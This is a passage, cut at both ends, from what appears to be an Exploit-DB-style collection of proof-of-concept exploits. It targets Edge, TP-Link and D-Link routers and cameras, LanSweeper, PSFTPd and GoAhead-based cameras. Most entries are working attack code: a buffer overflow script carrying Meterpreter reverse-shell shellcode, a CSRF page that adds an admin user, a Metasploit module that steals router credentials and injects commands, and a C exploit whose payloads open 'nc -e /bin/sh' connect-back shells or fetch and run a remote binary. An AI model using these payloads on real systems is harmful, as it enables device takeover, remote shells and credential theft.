<input type="hidden" name="AllowedDomainAction" value="0" />
<input type="hidden" name="ParentalPassword" value="Broadcom" />
<input type="hidden" name="ParentalPasswordReEnter" value="Broadcom" />
<input type="hidden" name="AccessDuration" value="30" />
<input type="submit" title="Enable Service" />
</form>
</html>
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1339
I accidentally found this while trying to reproduce another bug in Edge.
Failed to reproduce on Microsoft Edge 38.14393.1066.0, Microsoft EdgeHTML 14.14393.
Tested on Microsoft Edge 40.15063.0.0, Microsoft EdgeHTML 15.15063 (Insider Preview).
Crash Log:
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
chakra!JsUtil::WeaklyReferencedKeyDictionary<Js::DynamicType,Js::DynamicType * __ptr64,DefaultComparer<Js::DynamicType const * __ptr64>,1>::FindEntry<Js::DynamicType>+0x41:
00007fff`e2b7c841 8b0c81 mov ecx,dword ptr [rcx+rax*4] ds:0000023b`4a2ea4c4=????????
0:015> k
# Child-SP RetAddr Call Site
00 000000be`563fbba0 00007fff`e2f52e3e chakra!JsUtil::WeaklyReferencedKeyDictionary<Js::DynamicType,Js::DynamicType * __ptr64,DefaultComparer<Js::DynamicType const * __ptr64>,1>::FindEntry<Js::DynamicType>+0x41
01 000000be`563fbbf0 00007fff`e2e1f9a4 chakra!JsUtil::WeaklyReferencedKeyDictionary<Js::DynamicType,Js::DynamicType * __ptr64,DefaultComparer<Js::DynamicType const * __ptr64>,1>::TryGetValue+0x56
02 000000be`563fbc40 00007fff`e2cb58a9 chakra!Windows::Data::Text::IUnicodeCharactersStatics::`vcall'{144}'+0x58fc4
03 000000be`563fbcf0 00007fff`e2db04c8 chakra!Js::JavascriptObject::ChangePrototype+0x109
04 000000be`563fbd30 00007fff`e2dbe863 chakra!Js::JavascriptObject::EntrySetPrototypeOf+0xc8
05 000000be`563fbd80 00007fff`e2c5dfb8 chakra!amd64_CallFunction+0x93
06 000000be`563fbde0 00007fff`e2c610da chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > > >+0x158
07 000000be`563fbe80 00007fff`e2c67c61 chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > >+0xaa
08 000000be`563fbf00 00007fff`e2c6436c chakra!Js::InterpreterStackFrame::ProcessProfiled+0x131
09 000000be`563fbf60 00007fff`e2dc1bfd chakra!Js::InterpreterStackFrame::Process+0x12c
0a 000000be`563fbfc0 00007fff`e2d88cd5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x3bd
0b 000000be`563fc310 0000023a`3c412fc2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
0c 000000be`563fc360 00007fff`e2dbe863 0x0000023a`3c412fc2
0d 000000be`563fc390 00007fff`e2ca6113 chakra!amd64_CallFunction+0x93
0e 000000be`563fc3e0 00007fff`e2c52060 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
0f 000000be`563fc440 00007fff`e2c51167 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
10 000000be`563fc530 00007fff`e2d9ec52 chakra!Js::JavascriptFunction::CallRootFunction+0x4b
11 000000be`563fc5a0 00007fff`e2c50fa4 chakra!ScriptSite::CallRootFunction+0x6a
12 000000be`563fc600 00007fff`e2d30c99 chakra!ScriptSite::Execute+0x124
13 000000be`563fc690 00007fff`e2d31fde chakra!ScriptEngine::ExecutePendingScripts+0x1a5
14 000000be`563fc760 00007fff`e2d32271 chakra!ScriptEngine::ParseScriptTextCore+0x436
15 000000be`563fc8b0 00007fff`da0fe8d5 chakra!ScriptEngine::ParseScriptText+0xb1
16 000000be`563fc960 00007fff`da0fe71e edgehtml!CJScript9Holder::ParseScriptText+0x119
17 000000be`563fca00 00007fff`da0fe237 edgehtml!CScriptCollection::ParseScriptText+0x202
18 000000be`563fcae0 00007fff`da0fdb67 edgehtml!CScriptData::CommitCode+0x357
19 000000be`563fcca0 00007fff`da2c50ad edgehtml!CScriptData::Execute+0x20f
1a 000000be`563fcd50 00007fff`da136ad4 edgehtml!CHtmScriptParseCtx::Execute+0x7d
1b 000000be`563fcd80 00007fff`da135ba1 edgehtml!CHtmParseBase::Execute+0x204
1c 000000be`563fce10 00007fff`da2be8cb edgehtml!CHtmPost::Exec+0x1e1
1d 000000be`563fcff0 00007fff`da2be7af edgehtml!CHtmPost::Run+0x2f
1e 000000be`563fd020 00007fff`da2be663 edgehtml!PostManExecute+0x63
1f 000000be`563fd060 00007fff`da2be4fd edgehtml!PostManResume+0xa3
20 000000be`563fd0a0 00007fff`da2ccfb3 edgehtml!CHtmPost::OnDwnChanCallback+0x3d
21 000000be`563fd0f0 00007fff`da2a4ddb edgehtml!CDwnChan::OnMethodCall+0x23
22 000000be`563fd120 00007fff`da163f46 edgehtml!GWndAsyncTask::Run+0x1b
23 000000be`563fd150 00007fff`da280480 edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
24 000000be`563fd220 00007fff`da2802a3 edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
25 000000be`563fd270 00007fff`da164af3 edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
26 000000be`563fd2d0 00007fff`da162fe5 edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
27 000000be`563fd300 00007fff`fb3dbc50 edgehtml!GlobalWndProc+0x125
PoC:
-->
<script>
Object.setPrototypeOf({}, this);
location.reload();
</script>
# Exploit Title: XSS Vuln - TP-LINK TL-WR740N
# Date: 15/11/2017
# Exploit Author: bl00dy
# Vendor Homepage: http://www.tp-link.com <http://www.tp-link.com.br/>
# Version: TP-LINK TL-WR740N - 3.17.0 Build 140520 Rel.75075n
# Tested on: Windows 8.1
Cross-site scripting (XSS) in TP-LINK TL-WR740N
______________________________________________________
Proof of Concept:
1. Go to your wireless router ip (ex. 192.168.0.1)
2. Go to Wireless and -Wireless MAC Filtering- tab
3. Click Add new button
5.Write random MAC Address and in -Description- write (<h1>XSS by
bl00dy</h1>)
6.Click save and you will see XSS in Wireless MAC Filtering tab
______________________________________________________
# Exploit Title: D-Link DIR605L <=2.08 Denial of Service via HTTP GET (CVE-2017-9675)
# Date: 2017-11-14
# Exploit Author: Enrique Castillo
# Contact: https://twitter.com/_hyperlogic
# Detailed Analysis: http://hypercrux.com/bug-report/2017/06/19/DIR605L-DoS-BugReport/
# Vendor Homepage: http://us.dlink.com/
# Software Link: specific version no longer available on vendor site
# Version: 2.08UI and prior
# CVE : CVE-2017-9675
# Tested on Linux
###
# Description: Firmware versions 2.08UI and lower contain a bug in the function that handles HTTP GET requests for
# directory paths that can allow an unauthenticated attacker to cause complete denial of service (device reboot). This bug can be triggered
# from both LAN and WAN.
###
#!/usr/bin/env bash
# usage: ./sploit.sh <router_ip>
ROUTER=$1
if [ "$#" -ne 1 ]; then
echo "usage: $0 <router_ip>"
exit
fi
curl http://$ROUTER/Tools/
# Exploit Title: [D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability]
# Date: [26/03/2017]
# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot
# Vendor Homepage: [http://us.dlink.com/product-category/home-solutions/view/network-cameras/]
# Version: [Tested on DCS-936L with firmware version 1.03. Other versions/models are also be affected]
# Tested on: [DCS-936L with firmware version 1.02.01]
# CVE : [CVE-2017-7851]
==================
#Product:-
==================
Small and unobtrusive, SecuriCam™ IP surveillance solutions from D-Link allow you to monitor your offices or warehouses from anywhere - at anytime. Extreme Low LUX optics, 2 way audio, and full pan/tilt/zoom manipulation provide everything an SMB needs to safeguard their valuable resources.
==================
#Vulnerability:-
==================
D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability.
========================
#Vulnerability Details:-
========================
=============================================================================================================================
D-Link DCS-936L network camera incomplete/weak CSRF protection vulnerability (CVE-2017-7851)
=============================================================================================================================
D-Link DCS-936L devices with firmware 1.02.01 have CSRF. If a victim is logged into the camera's web console and visits a malicious site hosting a <Target_Device_IP.HTML> from another tab in the same browser, the malicious site can send requests to the victim's device. An attacker can add a new user, replace the firmware image with a malicious one, or connect the victim's device to a rogue Wireless Network.
An attacker can easily find out public IP address of victim's device on Shodan or similar search engines to create <Target_Device_IP.HTML> file. Victim must be logged into the camera's web console and visit attacker's site from another tab in the same browser.
#Proof-of-Concept:-
-------------------
D-Link DCS-936L prevents CSRF attack by looking at ‘Referer’ header. The ‘Referer’ IP should match with the one in ‘HOST’ header. If it does not, HTTP 403 is returned in the response. However, this device does not perform a strict check on ‘Referer’ header. It seems that it looks for the device’s IP address (which is the one in ‘HOST’ header) anywhere in the ‘Referer’ header. If found, it happily accepts the request.
An unauthenticated, remote attacker could host a malicious site that makes requests to the victim’s device without having credentials. In a targeted attack, an attacker needs to trick victim to visit a malicious site that exploits this vulnerability.
1. Attacker hosts a ‘<target_ip>.html’ on <attacking_ip>
<html>
<body>
<form id="CSRF" action="http://<target_ip>/eng/admin/tools_admin.cgi" method="POST">
<input type="hidden" name="user" value="hacker">
<input type="hidden" name="action" value="set">
<input type="hidden" name="password" value="abc123">
<input type="hidden" name="confirmPassword" value="abc123">
</form>
<script>
window.onload = function(){
document.forms['CSRF'].submit()
}
</script>
</body>
</html>
2. Victim logs into his device.
3. Victim then visits attackers site http://<attacking_ip>/<target_ip>.html
4. Above request adds a new user ‘Hacker’ which reboots the web server.
6. Browser sends add new user request to the target device <target_ip>. Victim's browser sets 'Referer' header to 'http://<attacking_ip>/<target_ip>.html'. As this contains the IP address of the device (<target_ip>), this request is processed successfully.
7. Server response shows user hacker added successfully:
8. Attacker can now log into the device as hacker/abc123
===================================
#Vulnerability Disclosure Timeline:
===================================
26/03/2017: First email to disclose vulnerability to D-Link incident response team.
26/03/2017: Vendor acknowledged the report.
25/05/2017: Vendor confirmed that development has been completed and it's undergoing security audit.
13/10/2017: Firmwared released to production: ftp://ftp2.dlink.com/PRODUCTS/DCS-936L/REVA/DCS-936L_REVA_FIRMWARE_v1.05.07.zip
13/11/2017: DCS-936L Firmware Release Notes: ftp://ftp2.dlink.com/PRODUCTS/DCS-936L/REVA/DCS-936L_REVA_RELEASE_NOTES_v1.05.07.pdf
15/11/2017: Published CVE-2017-7851
LanSweeper - Cross Site Scripting and HTMLi
Title: Vulnerability in LanSweeper
Date: 16-11-2017
Status: Vendor contacted, patch available
Author: Miguel Mendez Z
Vendor Homepage: http://www.lansweeper.com
Version: 6.0.100.75
CVE: CVE-2017-16841
Vulnerability description -------------------------
LanSweeper 6.0.100.75 has XSS via the description parameter to "/Calendar/CalendarActions.aspx".
Take control of the browser using the xss shell or perform malware attacks on users.
Vulnerable variable:
--------------------
"http://victim.com/Calendar/CalendarActions.aspx?action=scheduleinfo&id=2&__VIEWSTATE=&title=Test+Lansweeper&description=XSS/HTMLI&type=1&startdate=13/10/2017&txtStart=19:30&enddate=13/10/2017&txtEnd=21:30&reminder=15&repeattype=1&amount=1&repeatby=0&monthday=1&monthweekday=1&monthweekdayday=1&ends=1&occurrences=15&repeatenddate=&agents={"14":{"id":14,"editAllowed":true}}&teams=&delete=false"
"http://victim.com/Scanning/report.aspx?det=web50accessdeniederrors&title=XSS/HTMLI"
"http://victim.com/Software/report.aspx?det=XSS/HTMLI&title=Linux Software"
Poc:
----
https://www.youtube.com/watch?v=u213EqTSsXQ
# Tested on Windows 10 (x86)
# The application requires to have the web server enabled.
# Exploit for older version: https://www.exploit-db.com/exploits/40832/
#!/usr/bin/python
import socket,os,time,struct,argparse
parser = argparse.ArgumentParser()
parser.add_argument('--host', required=True)
args = parser.parse_args()
host = args.host
port = 80
# root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.116.166 LPORT=4455 -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f py
shellcode = ""
shellcode += "\xba\xb6\x9f\x39\x88\xd9\xf7\xd9\x74\x24\xf4\x5e\x31"
shellcode += "\xc9\xb1\x54\x83\xee\xfc\x31\x56\x0f\x03\x56\xb9\x7d"
shellcode += "\xcc\x74\x2d\x03\x2f\x85\xad\x64\xb9\x60\x9c\xa4\xdd"
shellcode += "\xe1\x8e\x14\x95\xa4\x22\xde\xfb\x5c\xb1\x92\xd3\x53"
shellcode += "\x72\x18\x02\x5d\x83\x31\x76\xfc\x07\x48\xab\xde\x36"
shellcode += "\x83\xbe\x1f\x7f\xfe\x33\x4d\x28\x74\xe1\x62\x5d\xc0"
shellcode += "\x3a\x08\x2d\xc4\x3a\xed\xe5\xe7\x6b\xa0\x7e\xbe\xab"
shellcode += "\x42\x53\xca\xe5\x5c\xb0\xf7\xbc\xd7\x02\x83\x3e\x3e"
shellcode += "\x5b\x6c\xec\x7f\x54\x9f\xec\xb8\x52\x40\x9b\xb0\xa1"
shellcode += "\xfd\x9c\x06\xd8\xd9\x29\x9d\x7a\xa9\x8a\x79\x7b\x7e"
shellcode += "\x4c\x09\x77\xcb\x1a\x55\x9b\xca\xcf\xed\xa7\x47\xee"
shellcode += "\x21\x2e\x13\xd5\xe5\x6b\xc7\x74\xbf\xd1\xa6\x89\xdf"
shellcode += "\xba\x17\x2c\xab\x56\x43\x5d\xf6\x3e\xa0\x6c\x09\xbe"
shellcode += "\xae\xe7\x7a\x8c\x71\x5c\x15\xbc\xfa\x7a\xe2\xc3\xd0"
shellcode += "\x3b\x7c\x3a\xdb\x3b\x54\xf8\x8f\x6b\xce\x29\xb0\xe7"
shellcode += "\x0e\xd6\x65\x9d\x04\x40\x2a\x72\x6d\x36\x5a\x71\x8d"
shellcode += "\x27\xfc\xfc\x6b\x17\x52\xaf\x23\xd7\x02\x0f\x94\xbf"
shellcode += "\x48\x80\xcb\xdf\x72\x4a\x64\x75\x9d\x23\xdc\xe1\x04"
shellcode += "\x6e\x96\x90\xc9\xa4\xd2\x92\x42\x4d\x22\x5c\xa3\x24"
shellcode += "\x30\x88\xd2\xc6\xc8\x48\x7f\xc7\xa2\x4c\x29\x90\x5a"
shellcode += "\x4e\x0c\xd6\xc4\xb1\x7b\x64\x02\x4d\xfa\x5d\x78\x7b"
shellcode += "\x68\xe2\x16\x83\x7c\xe2\xe6\xd5\x16\xe2\x8e\x81\x42"
shellcode += "\xb1\xab\xce\x5e\xa5\x67\x5a\x61\x9c\xd4\xcd\x09\x22"
shellcode += "\x02\x39\x96\xdd\x61\x3a\xd1\x22\xf7\x1e\x7a\x4b\x07"
shellcode += "\x1e\x7a\x8b\x6d\x9e\x2a\xe3\x7a\xb1\xc5\xc3\x83\x18"
shellcode += "\x8e\x4b\x09\xcc\x7c\xed\x0e\xc5\x21\xb3\x0f\xe9\xf9"
shellcode += "\xa2\x81\x0e\xfe\xca\x63\x33\x28\xf3\x11\x74\xe8\x40"
shellcode += "\x29\xcf\x4d\xe0\xa0\x2f\xc1\xf2\xe0"
buffer = "\x41" * 780
buffer += struct.pack("<L", 0x10090c83) # JMP ESP - libspp
buffer += "\x90" * 12
buffer += shellcode
buffer += "\x90" * (10000 - len(buffer))
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.228.140\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=" + buffer
evil += "&password=" + buffer + "\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((host,port))
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
X41 D-Sec GmbH Security Advisory: X41-2017-006
Multiple Vulnerabilities in PSFTPd Windows FTP Server
=====================================================
Overview
--------
Confirmed Affected Versions: 10.0.4 Build 729
Confirmed Patched Versions: None
Vendor: Sergei Pleis Softwareentwicklung
Vendor URL: http://www.psftp.de/ftp-server/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn, Markus Vervier
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-006-psftpd/
Summary and Impact
------------------
Several issues have been identified, which allow attackers to hide
information in log files, recover passwords and crash the whole server.
It uses neither ASLR nor DEP to make exploitation harder.
Product Description
-------------------
From the vendor page, roughly translated:
PSFTPd is a userfriendly, functional and robust FTP server software with
support for FTP, FTPS and SFTP.
Use after free
==============
Severity Rating: High
Vector: Network
CVE: CVE-2017-15271
CWE: 416
CVSS Score: 7.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Summary and Impact
------------------
An invalid memory access issue could be triggered remotely in the SFTP
component of PSFTPd. This issue could be triggered prior authentication.
The PSFTPd server did not automatically restart, which enabled attackers
to perform a very effective DoS attack against this service. By sending
the following SSH identification / version string to the server, a NULL
pointer dereference could be triggered:
$ cat tmp.14
SSH-2.0-BBBBBBBB
CCCCCCCCCCCC
$ cat tmp.14 | socat - TCP:192.168.122.50:22
The issue appears to be a race condition in the window message handling,
performing the cleanup for invalid connections. Upon further
investigation X41 D-Sec GmbH could confirm that the accessed memory was
already freed.
X41 D-Sec GmbH enabled the memory debugging functionality page heap for
the psftpd_svc.exe exeutable using the command agflags.exe /p /disable
psftpd_svc.exe /fulla. When observing the crash in the WinDBG 19
debugging tool, it could be confirmed that access to an already freed
page was taking place.
Log Injection
=============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-15270
CWE: 117
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Summary and Impact
------------------
The PSFTPd server does not properly escape data before writing it into a
Comma Separated Values (CSV) file. This can be used by attackers to hide
data in the Graphical User Interface (GUI) view and create arbitrary
entries to a certain extent.
Special characters as '"', ',' and '\r' are not escaped and can be used
to add new entries to the log.
Workarounds
-----------
None
Passwords stored in Plain Text
==============================
Severity Rating: Low
Vector: Local
CVE: CVE-2017-15272
CWE: 312
CVSS Score: 3.3
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Summary and Impact
------------------
The PSFTPd server stores its configuration inside the PSFTPd.dat. This
file is a Microsoft Access Database and can be extracted by using the
command "mdb-export PSFTPd.dat USERS" from mdbtools
(https://github.com/brianb/mdbtools). The application sets the encrypt
flag with the password "ITsILLEGAL", but this is not required to extract
the data.
The users password is shown in clear text, since it is not stored securely.
Workarounds
-----------
Use the Active Directory connector for your users.
FTP Bounce Scan
===============
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-15269
CWE: 441
CVSS Score: 5.0
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Summary and Impact
------------------
The PSFTPd server does not prevent FTP bounce scans by default.
These can be performed using "nmap -b" and allow to perform scans via
the FTP server.
Workarounds
-----------
It is possible to prevent FTP bounce scans by setting: Kontrollmanager >
Domain > Sicherheit > Register "FTP Bounce and FXP"
Workarounds
-----------
None
About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.
Timeline
--------
2017-08-31 Issues found
2017-09-18 Vendor contacted
2017-09-19 Vendor reply
2017-10-11 CVE IDs requested
2017-10-11 CVE IDs assigned
2017-11-06 Vendor informed us, that apparently a fixed version was
released. We cannot confirm, since we do not have
access.
2017-11-07 Public release
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'openssl'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'DIR-850L (Un)authenticated OS Command Exec',
'Description' => %q{
This module leverages an unauthenticated credential disclosure
vulnerability to then execute arbitrary commands on DIR-850L routers
as an authenticated user. Unable to use Meterpreter payloads.
},
'Author' => [
'Mumbai', # https://github.com/realoriginal (module)
'Zdenda' # vuln discovery
],
'References' => [
['URL', 'https://www.seebug.org/vuldb/ssvid-96333'],
['URL', 'https://blogs.securiteam.com/index.php/archives/3310'],
],
'DisclosureDate' => 'Aug 9 2017',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsbe/shell/reverse_tcp'
},
'Privileged' => true,
'Payload' => {
'DisableNops' => true,
},
'Targets' => [[ 'Automatic', {} ]],
))
end
def check
begin
res = send_request_cgi({
'uri' => '/',
'method' => 'GET'
})
if res && res.headers['Server']
auth = res.headers['Server']
if auth =~ /DIR-850L/
if auth =~ /WEBACCESS\/1\.0/
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Detected
end
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: opts[:service_name],
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
# some other DIR-8X series routers are vulnerable to this same retrieve creds vuln as well...
# should write an auxiliary module to-do -> WRITE AUXILIARY
def retrieve_creds
begin
xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
xml << "<postxml>\r\n"
xml << "<module>\r\n"
xml << " <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n"
xml << "</module>\r\n"
xml << "</postxml>"
res = send_request_cgi({
'uri' => '/hedwig.cgi',
'method' => 'POST',
'encode_params' => false,
'headers' => {
'Accept-Encoding' => 'gzip, deflate',
'Accept' => '*/*'
},
'ctype' => 'text/xml',
'cookie' => "uid=#{Rex::Text.rand_text_alpha_lower(8)}",
'data' => xml,
})
if res.body =~ /<password>(.*)<\/password>/ # fixes stack trace issue
parse = res.get_xml_document
username = parse.at('//name').text
password = parse.at('//password').text
vprint_good("#{peer} - Retrieved the username/password combo #{username}/#{password}")
loot = store_loot("dlink.dir850l.login", "text/plain", rhost, res.body)
print_good("#{peer} - Downloaded credentials to #{loot}")
return username, password
else
fail_with(Failure::NotFound, "#{peer} - Credentials could not be obtained")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def retrieve_uid
begin
res = send_request_cgi({
'uri' => '/authentication.cgi',
'method' => 'GET',
})
parse = res.get_json_document
uid = parse['uid']
challenge = parse['challenge']
return uid, challenge
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def login(username, password)
uid, challenge = retrieve_uid
begin
hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
send_request_cgi({
'uri' => '/authentication.cgi',
'method' => 'POST',
'data' => "id=#{username}&password=#{hash}",
'cookie' => "uid=#{uid}"
})
return uid
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def execute_command(cmd, opts)
uid = login(@username, @password) # reason being for loop is cause UID expires for some reason after executing 1 command
payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
payload << "<postxml>\r\n"
payload << "<module>\r\n"
payload << " <service>DEVICE.TIME</service>\r\n"
payload << " <device>\r\n"
payload << " <time>\r\n"
payload << " <ntp>\r\n"
payload << " <enable>1</enable>\r\n"
payload << " <period>604800</period>\r\n"
payload << " <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}&); </server>\r\n"
payload << " </ntp>\r\n"
payload << " <ntp6>\r\n"
payload << " <enable>1</enable>\r\n"
payload << " <period>604800</period>\r\n"
payload << " </ntp6>\r\n"
payload << " <timezone>20</timezone>\r\n"
payload << " <time/>\r\n"
payload << " <date/>\r\n"
payload << " <dst>0</dst>\r\n"
payload << " <dstmanual/>\r\n"
payload << " <dstoffset/>\r\n"
payload << " </time>\r\n"
payload << " </device>\r\n"
payload << "</module>\r\n"
payload << "</postxml>"
begin
# save configuration
res = send_request_cgi({
'uri' => '/hedwig.cgi',
'method' => 'POST',
'ctype' => 'text/xml',
'data' => payload,
'cookie' => "uid=#{uid}"
})
# execute configuration
res = send_request_cgi({
'uri' => '/pigwidgeon.cgi',
'method' => 'POST',
'data' => 'ACTIONS=SETCFG,ACTIVATE',
'cookie' => "uid=#{uid}"
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end
end
def exploit
print_status("#{peer} - Connecting to target...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable url")
end
#
# Information Retrieval, obtains creds and logs in
#
@username, @password = retrieve_creds
execute_cmdstager(
:flavor => :wget,
:linemax => 200
)
end
end
// Exploit-DB Note ~ Source: https://pierrekim.github.io/advisories/expl-goahead-camera.c
// Exploit-DB Note ~ Credit: https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#define CAM_PORT 80
#define REMOTE_HOST "192.168.1.1"
#define REMOTE_PORT "1337"
#define PAYLOAD_0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20" REMOTE_HOST "+" REMOTE_PORT "%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define PAYLOAD_1 "GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\r\n\r\n"
#define PAYLOAD_2 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define ALTERNATIVE_PAYLOAD_zero0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+" REMOTE_HOST "+" REMOTE_PORT "+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
#define ALTERNATIVE_PAYLOAD_zero1 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://" REMOTE_HOST "/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
char * creds(char *argv,
int get_config);
int rce(char *argv,
char *id,
char attack[],
char desc[]);
int main(int argc,
char **argv,
char **envp)
{
char *id;
printf("Camera 0day root RCE with connect-back @PierreKimSec\n\n");
if (argc < 2)
{
printf("%s target\n", argv[0]);
printf("%s target --get-config will dump the configuration and exit\n", argv[0]);
return (1);
}
if (argc == 2)
printf("Please run `nc -vlp %s` on %s\n\n", REMOTE_PORT, REMOTE_HOST);
if (argc == 3 && !strcmp(argv[2], "--get-config"))
id = creds(argv[1], 1);
else
id = creds(argv[1], 0);
if (id == NULL)
{
printf("exploit failed\n");
return (1);
}
printf("done\n");
printf(" login = %s\n", id);
printf(" pass = %s\n", id + 32);
if (!rce(argv[1], id, PAYLOAD_0, "planting"))
printf("done\n");
sleep(1);
if (!rce(argv[1], id, PAYLOAD_1, "executing"))
printf("done\n");
if (!rce(argv[1], id, PAYLOAD_2, "cleaning"))
printf("done\n");
if (!rce(argv[1], id, PAYLOAD_1, "cleaning"))
printf("done\n");
printf("[+] enjoy your root shell on %s:%s\n", REMOTE_HOST, REMOTE_PORT);
return (0);
}
char * creds(char *argv,
int get_config)
{
int sock;
int n;
struct sockaddr_in serv_addr;
char buf[8192] = { 0 };
char *out;
char *tmp;
char payload[] = "GET /system.ini?loginuse&loginpas HTTP/1.0\r\n\r\n";
int old_n;
int n_total;
sock = 0;
n = 0;
old_n = 0;
n_total = 0;
printf("[+] bypassing auth ... ");
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Error while creating socket\n");
return (NULL);
}
memset(&serv_addr, '0', sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(CAM_PORT);
if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
{
printf("Error while inet_pton\n");
return (NULL);
}
if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
{
printf("creds: connect failed\n");
return (NULL);
}
if (send(sock, payload, strlen(payload) , 0) < 0)
{
printf("creds: send failed\n");
return (NULL);
}
if (!(tmp = malloc(10 * 1024 * sizeof(char))))
return (NULL);
if (!(out = calloc(64, sizeof(char))))
return (NULL);
while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)
{
n_total += n;
if (n_total < 1024 * 10)
memcpy(tmp + old_n, buf, n);
if (n >= 0)
old_n = n;
}
close(sock);
/*
[ HTTP HEADERS ]
...
000????: 0000 0a0a 0a0a 01.. .... .... .... ....
^^^^ ^^^^ ^^
